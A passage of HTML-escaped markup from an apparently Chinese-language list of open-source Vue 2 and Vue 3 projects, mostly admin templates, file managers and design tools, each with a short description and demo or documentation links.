            &lt;a href=&quot;https://github.com/xyxiao001/vue-cropper&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-cropper&lt;/a&gt; - 一个优雅的图片裁剪插件。&lt;a href=&quot;https://github.xyxiao.cn/vue-cropper/docs/vue2.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/501351981/vue-office&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-office&lt;/a&gt; - 支持 &lt;code&gt;word(.docx)&lt;/code&gt;、&lt;code&gt;excel(.xlsx)&lt;/code&gt;、&lt;code&gt;pdf&lt;/code&gt; 等各类型 &lt;code&gt;office&lt;/code&gt; 文件预览的 &lt;code&gt;Vue&lt;/code&gt; 组件集合。&lt;a href=&quot;https://501351981.github.io/vue-office/examples/dist/#/docx&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://501351981.github.io/vue-office/examples/docs/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/PanJiaChen/vue-admin-template&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-admin-template&lt;/a&gt; - 一个极简的 &lt;code&gt;vue&lt;/code&gt; &lt;code&gt;admin&lt;/code&gt; 管理后台。&lt;a href=&quot;https://panjiachen.github.io/vue-admin-template/#/login?redirect=%2Fdashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Kchengz/k-form-design&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;k-form-design&lt;/a&gt; - 基于 &lt;code&gt;Vue Ant-Design&lt;/code&gt; 的表单设计器。&lt;a href=&quot;http://cdn.kcz66.com/k-form-design.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/gridsome/gridsome&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;gridsome&lt;/a&gt; - &amp;nbsp;轻松构建静态生成的网站和应用程序。&lt;a href=&quot;https://gridsome.org/docs/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/filebrowser/filebrowser&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;filebrowser&lt;/a&gt; - 使用 &lt;code&gt;Go&lt;/code&gt; + &lt;code&gt;Vue&lt;/code&gt; 编写的工具，用于在浏览器中对服务器上的文件进行管理。&lt;a href=&quot;https://demo.filebrowser.org/login?redirect=%2Ffiles%2F&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://filebrowser.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Wscats/emoji&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;emoji&lt;/a&gt; - 基于 &lt;code&gt;Vue&lt;/code&gt; 编写的 &lt;code&gt;Github&lt;/code&gt; 表情包大全。&lt;a href=&quot;https://wscats.github.io/emoji/omi/build/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/AutoPiano/AutoPiano&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;AutoPiano&lt;/a&gt; - 自由钢琴。&lt;a href=&quot;https://www.autopiano.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/filegator/filegator&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;filegator&lt;/a&gt; - 强大的多用户文件管理器。&lt;a href=&quot;https://demo.filegator.io/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/PowerDos/Mall-Vue&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Mall-Vue&lt;/a&gt; - 一个基于 &lt;code&gt;Vue&lt;/code&gt; + &lt;code&gt;Vuex&lt;/code&gt; + &lt;code&gt;iView&lt;/code&gt; 做的一个电商网站前端项目。&lt;a href=&quot;https://powerdos.github.io/Mall-Vue/index.html#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/d2-projects/folder-explorer&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;folder-explorer&lt;/a&gt; - 分析文件目录，统计数据并以树形结构和图表的形式展示结果，也可以导出多种格式留存。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;vue3-项目&quot;&gt;
    &lt;a href=&quot;?id=vue3-%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;vue3-项目&quot;&gt;&lt;code&gt;Vue3&lt;/code&gt; 项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lyt-Top/vue-next-admin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-next-admin&lt;/a&gt; - 基于 &lt;code&gt;vue3.x&lt;/code&gt; + &lt;code&gt;CompositionAPI setup&lt;/code&gt; 语法糖 + &lt;code&gt;typescript&lt;/code&gt; + &lt;code&gt;vite&lt;/code&gt; + &lt;code&gt;element plus&lt;/code&gt; + &lt;code&gt;vue-router-next&lt;/code&gt; + &lt;code&gt;pinia&lt;/code&gt; 技术，适配手机、平板、&lt;code&gt;pc&lt;/code&gt; 的&lt;strong&gt;后台开源免费模板&lt;/strong&gt;。&lt;a href=&quot;https://lyt-top.gitee.io/vue-next-admin-preview/#/login&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://lyt-top.gitee.io/vue-next-admin-doc-preview/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/RainManGO/vue3-composition-admin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue3-composition-admin&lt;/a&gt; - 一个&lt;strong&gt;管理端模板&lt;/strong&gt;解决方案，基于&lt;code&gt;vue3&lt;/code&gt;, &lt;code&gt;ts&lt;/code&gt; 和 &lt;code&gt;element-plus&lt;/code&gt;，项目都是以 &lt;code&gt;composition api&lt;/code&gt; 风格编写。&lt;a href=&quot;https://admin-tmpl-test.rencaiyoujia.cn/#/login?redirect=/dashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/vbenjs/vue-vben-admin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-vben-admin&lt;/a&gt; - 免费开源的&lt;strong&gt;中后台模版&lt;/strong&gt;，基于&lt;code&gt;Vue3&lt;/code&gt;, &lt;code&gt;Vite2&lt;/code&gt;,&lt;code&gt;TypeScript&lt;/code&gt; 等主流技术开发，开箱即用的&lt;strong&gt;中后台前端&lt;/strong&gt;解决方案。&lt;a href=&quot;https://vben.vvbin.cn/#/login?redirect=/dashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/rocboss/paopao-ce&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;paopao-ce&lt;/a&gt; - 基于 &lt;code&gt;gin&lt;/code&gt; + &lt;code&gt;zinc&lt;/code&gt; + &lt;code&gt;vue&lt;/code&gt; + &lt;code&gt;ts&lt;/code&gt; &amp;nbsp;的清新文艺&lt;strong&gt;微社区&lt;/strong&gt;。&lt;a href=&quot;https://www.paopao.info/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/GeekQiaQia/vue3.0-template-admin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue3.0-template-admin&lt;/a&gt; - 基于 &lt;code&gt;Vue3&lt;/code&gt; + &lt;code&gt;ElementPlus&lt;/code&gt; + &lt;code&gt;Typescript&lt;/code&gt; + &lt;code&gt;Vite&lt;/code&gt; 搭建的&lt;strong&gt;后台管理模板&lt;/strong&gt;；并基于常见业务场景，抽象出常见功能组件；包括动态菜单，菜单权限、登录、主题切换、国际化、个人中心、表单页、列表页、复制文本、二维码分享等等。&lt;a href=&quot;https://geekqiaqia.github.io/vue3.0-template-admin/#/login?redirect=/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/liyupi/yuindex&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;yuindex&lt;/a&gt; - 极客范儿的浏览器主页 ，&lt;code&gt;Vue3&lt;/code&gt; + &lt;code&gt;Node.js&lt;/code&gt; 全栈项目，自实现 &lt;code&gt;web&lt;/code&gt; 终端 + &lt;strong&gt;命令系统&lt;/strong&gt;。&lt;a href=&quot;https://yuindex.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/gmingchen/vue3-element-plus-admin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue3-element-plus-admin&lt;/a&gt; - 基于 &lt;code&gt;Vue3&lt;/code&gt; + &lt;code&gt;Element-Plus&lt;/code&gt; + &lt;code&gt;Java&lt;/code&gt; 的多企业后台权限管理系统，提供了完善的权限体系，可以用于&lt;strong&gt;网站管理后台&lt;/strong&gt;、&lt;code&gt;SAAS&lt;/code&gt;、&lt;code&gt;CMS&lt;/code&gt;、&lt;code&gt;CRM&lt;/code&gt;、&lt;code&gt;OA&lt;/code&gt;、&lt;code&gt;ERP&lt;/code&gt;等，企业和个人都可以免费使用。&lt;a href=&quot;http://admin.gumingchen.icu/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;http://admin.gumingchen.icu/doc/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/honghuangdc/soybean-admin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;soybean-admin&lt;/a&gt; - 基于&lt;code&gt;Vue3&lt;/code&gt;、&lt;code&gt;Vite3&lt;/code&gt;、&lt;code&gt;TypeScript&lt;/code&gt;、&lt;code&gt;NaiveUI&lt;/code&gt; 和 &lt;code&gt;UnoCSS&lt;/code&gt; 的清新优雅的&lt;strong&gt;中后台模版&lt;/strong&gt;。&lt;a href=&quot;https://soybean.pro/#/login?redirect=/dashboard/analysis&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://docs.soybean.pro/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/cool-team-official/cool-admin-vue&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cool-admin-vue&lt;/a&gt; - 一个很酷的&lt;strong&gt;后台权限管理框架&lt;/strong&gt;，模块化、插件化、CRUD极速开发，永久开源免费，基于&lt;code&gt;midway.js 3.0&lt;/code&gt;、&lt;code&gt;typeorm&lt;/code&gt;、&lt;code&gt;mysql&lt;/code&gt;、&lt;code&gt;jwt&lt;/code&gt;、&lt;code&gt;element-ui&lt;/code&gt;、&lt;code&gt;vuex&lt;/code&gt;、&lt;code&gt;vue-router&lt;/code&gt;、&lt;code&gt;vue&lt;/code&gt; 等构建。&lt;a href=&quot;https://show.cool-admin.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &amp;nbsp;账户：&lt;code&gt;admin&lt;/code&gt;，密码：&lt;code&gt;123456&lt;/code&gt; &lt;a href=&quot;https://cool-js.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/pipipi-pikachu/PPTist&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;PPTist&lt;/a&gt; - 基于 &lt;code&gt;Vue3.x&lt;/code&gt; + &lt;code&gt;TypeScript&lt;/code&gt; 的&lt;strong&gt;在线演示文稿（幻灯片）应用&lt;/strong&gt;，还原了大部分 &lt;code&gt;Office PowerPoint&lt;/code&gt; 常用功能，实现在线 &lt;code&gt;PPT&lt;/code&gt; 的编辑、演示。支持导出 &lt;code&gt;PPT&lt;/code&gt; 文件。&lt;a href=&quot;https://pipipi-pikachu.github.io/PPTist/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/flipped-aurora/gin-vue-admin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;gin-vue-admin&lt;/a&gt; - 基于&lt;code&gt;Vite&lt;/code&gt; + &lt;code&gt;Vue3&lt;/code&gt; + &lt;code&gt;Gin&lt;/code&gt; 搭建的开发基础平台（支持 &lt;code&gt;Ts&lt;/code&gt; , &lt;code&gt;Js&lt;/code&gt; 混用），集成 &lt;code&gt;Jwt&lt;/code&gt; 鉴权，权限管理，动态路由，显隐可控组件，分页封装，多点登录拦截，资源权限，上传下载，代码生成器，表单生成器等开发必备功能。&lt;a href=&quot;https://demo.gin-vue-admin.com/#/login?redirect=%23/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://www.gin-vue-admin.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lin-xin/vue-manage-system&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-manage-system&lt;/a&gt; - 基于 &lt;code&gt;Vue3&lt;/code&gt; + &lt;code&gt;Element UI Plus&lt;/code&gt; 的&lt;strong&gt;后台管理系统&lt;/strong&gt;解决方案。&lt;a href=&quot;https://lin-xin.gitee.io/example/work/#/dashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mvpyb/vite-element-admin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vite-element-admin&lt;/a&gt; - 免费开源的&lt;strong&gt;中后台模版&lt;/strong&gt;，使用了 &lt;code&gt;Vue3&lt;/code&gt;、&lt;code&gt;vite2&lt;/code&gt; 等技术开发，开箱即用。&lt;a href=&quot;https://simmon_page.gitee.io/vite-element-admin/dist/#/dashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/lolicode/scui&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;scui&lt;/a&gt; - 一款开箱即用、高可配、高性能、风格精致、代码优雅的基于 &lt;code&gt;Vue3&lt;/code&gt; 和 &lt;code&gt;ElementPlus&lt;/code&gt; 的 &lt;code&gt;WebUI&lt;/code&gt; &lt;strong&gt;前端框架&lt;/strong&gt;。 &lt;a href=&quot;https://lolicode.gitee.io/scui-doc/demo/#/login&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://lolicode.gitee.io/scui-doc/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/HalseySpicy/Geeker-Admin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Geeker-Admin&lt;/a&gt; - 基于 &lt;code&gt;Vue3.2&lt;/code&gt;、&lt;code&gt;TypeScript&lt;/code&gt;、&lt;code&gt;Vite3&lt;/code&gt;、&lt;code&gt;Pinia&lt;/code&gt;、&lt;code&gt;Element-Plus&lt;/code&gt; 开源的一套&lt;strong&gt;后台管理框架&lt;/strong&gt;。&lt;a href=&quot;https://admin.spicyboy.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://docs.spicyboy.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/yue1123/vue3-baidu-map-gl&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue3-baidu-map-gl&lt;/a&gt; - 百度地图 &lt;code&gt;GL&lt;/code&gt; 版 &lt;code&gt;Vue3&lt;/code&gt; 组件库。&lt;a href=&quot;https://yue1123.github.io/vue3-baidu-map-gl/zh-CN/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/pure-admin/vue-pure-admin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-pure-admin&lt;/a&gt; - &lt;code&gt;Vue3&lt;/code&gt; + &lt;code&gt;Vite4&lt;/code&gt; + &lt;code&gt;Element-Plus&lt;/code&gt; + &lt;code&gt;TypeScript&lt;/code&gt; 编写的一款后台管理系统。&lt;a href=&quot;https://yiming_chang.gitee.io/vue-pure-admin/#/login&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/chuzhixin/vue-admin-better&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-admin-better&lt;/a&gt; - &lt;code&gt;Vue&lt;/code&gt; 后台管理。&lt;a href=&quot;https://vue-admin-beautiful.com/shop-vite/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/cool-team-official/cool-admin-midway&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cool-admin-midway&lt;/a&gt; - 一个很酷的后台权限管理框架，模块化、插件化、&lt;code&gt;CRUD&lt;/code&gt; 极速开发。&lt;a href=&quot;https://show.cool-admin.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xiaoli1999/custom-avatar&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;custom-avatar&lt;/a&gt; - 快速定制中国传统节日头像，国庆国旗头像。&lt;a href=&quot;https://www.xiaoli.vip/custom-avatar/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/slidevjs/slidev&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;slidev&lt;/a&gt; - 为&lt;strong&gt;开发者&lt;/strong&gt;打造的&lt;strong&gt;演示文稿&lt;/strong&gt;工具。&lt;a href=&quot;https://cn.sli.dev/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/leon-kfd/Dashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Dashboard&lt;/a&gt; - 基于&lt;code&gt;Vue3&lt;/code&gt;, &lt;code&gt;Typescript&lt;/code&gt;, &lt;code&gt;Vite&lt;/code&gt;的一个完全自定义配置的浏览器起始页。&lt;a href=&quot;https://www.howdz.xyz/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dromara/go-view&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;go-view&lt;/a&gt; - 一个低代码数据可视化开发平台。&lt;a href=&quot;https://vue.mtruning.club/#/project/items&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://www.mtruning.club/guide/start/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lyswhut/lx-music-desktop&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;lx-music-desktop&lt;/a&gt; - 一个基于 &lt;code&gt;Electron&lt;/code&gt; + &lt;code&gt;Vue3&lt;/code&gt; 开发的&lt;strong&gt;音乐软件&lt;/strong&gt;。&lt;a href=&quot;https://lxmusic.toside.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dromara/yft-design&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;yft-design&lt;/a&gt; - 基于 &lt;code&gt;Vue3&lt;/code&gt; + &lt;code&gt;TypeScript&lt;/code&gt; + &lt;code&gt;Fabric.js&lt;/code&gt; + &lt;code&gt;Element-Plus&lt;/code&gt; 实现的多页面图片设计器。&lt;a href=&quot;https://yft.design/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/LvHuaiSheng/gzm-design&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;gzm-design&lt;/a&gt; - 一个基于 &lt;code&gt;vue3&lt;/code&gt; + &amp;nbsp;&lt;code&gt;vite4&lt;/code&gt; + &lt;code&gt;TypeScript&lt;/code&gt; 免费开源的海报设计器。&lt;a href=&quot;http://gzm-design.guozimi.cn/#/editor&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/yangzongzhuan/RuoYi-Vue3&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;RuoYi-Vue3&lt;/a&gt; - &lt;code&gt;RuoYi&lt;/code&gt; &lt;code&gt;Vue3&lt;/code&gt; 版本。&lt;a href=&quot;https://vue.ruoyi.vip/login?redirect=%2Findex&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://doc.ruoyi.vip/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/newbee-ltd/newbee-mall-vue3-app&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;newbee-mall-vue3-app&lt;/a&gt; - &lt;code&gt;Vue3&lt;/code&gt; 全家桶 + &lt;code&gt;Vant&lt;/code&gt; 搭建大型单页面商城项目。&lt;a href=&quot;http://47.99.134.126:5008/#/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/webyang-male/nuxt3-edu&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;nuxt3-edu&lt;/a&gt; - &lt;code&gt;Nuxt3&lt;/code&gt; + &lt;code&gt;Vue3&lt;/code&gt; 实战在线教育 &lt;code&gt;SSR&lt;/code&gt; 网站。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/AnsGoo/openDataV&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;openDataV&lt;/a&gt; - 一个纯前端的拖拽式、可视化、低代码数据可视化开发平台。&lt;a href=&quot;https://datav.byteportrait.com/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/chansee97/nova-admin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;nova-admin&lt;/a&gt; - 一个简洁、干净的中后台管理模板。&lt;a href=&quot;https://nova-admin-site.netlify.app/dashboard/workbench&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://nova-admin-docs.netlify.app/zh/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/JessYan0913/pictode&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pictode&lt;/a&gt; - 一个基于 &lt;code&gt;Vue3&lt;/code&gt;、&lt;code&gt;TypeScript&lt;/code&gt;、&lt;code&gt;Konva&lt;/code&gt;、&lt;code&gt;HeadlessUI&lt;/code&gt; 和 &lt;code&gt;Tailwind CSS&lt;/code&gt; 等酷炫技术构建的画板项目。&lt;a href=&quot;https://pictode.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
